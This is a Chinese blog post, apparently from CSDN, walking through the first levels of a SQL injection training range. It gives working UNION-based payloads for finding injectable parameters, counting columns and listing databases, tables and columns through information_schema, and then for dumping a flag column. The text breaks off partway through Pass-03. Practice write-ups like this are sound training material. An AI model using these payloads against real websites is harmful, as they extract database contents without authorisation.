-
掌控安全学院SQL注入靶场
掌控安全学院SQL注入靶场
靶场地址
Pass-01 显错注入
判断注入类型发现是数字型注入
1 or 1=1 # 1' or '1'='1 # 1" or "1"="1 #- 1
- 2
- 3
利用order by得到数据库有三列
?id=0 union select 1,2,3#得到回显位23
查库名
可以通过information_schema库或者直接select database()?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select database())#- 1
查表名?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='error'),3#- 1
查列名
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='error'),(select group_concat(column_name) from information_schema.columns where table_name='error_flag')#- 1
可以看到有flag列,直接输出?id=0 union select 1,(select group_concat(flag) from error.error_flag),3#- 1
Pass-02
测试得题目为单引号字符型注入
这里#注释会报错,转用--+?id=0' union select 1,2,3 --+- 1
爆库
?id=0' union select 1,(select database()),3--+- 1
后面和Pass-01一样
直接得到flag?id=0' union select 1,(select group_concat(flag) from error.error_flag),3--+- 1
Pass-03
查看语句得知需要
')闭合前面的('?id=0' -
相关阅读:
力扣刷题day40|139单词拆分、多重背包问题总结
【数据库】达梦数据库DM8开发版安装
面试题总结(三) -- 内存管理篇
(二十五)大数据实战——kafka集群及Kafka-Eagle控制台安装与部署
【愚公系列】2022年11月 .NET CORE工具案例-StackExchange.Redis代码变量方式实现商品秒杀
Github 2024-07-11 开源项目日报 Top10
可以完成一下计算机网络的配置吗
Spring Boot 实现跨域的五种方式,总有一种适合你
CSS:border作用
Java 基于 SpringBoot 的学生考勤系统
- 原文地址:https://blog.csdn.net/qaq517384/article/details/127865776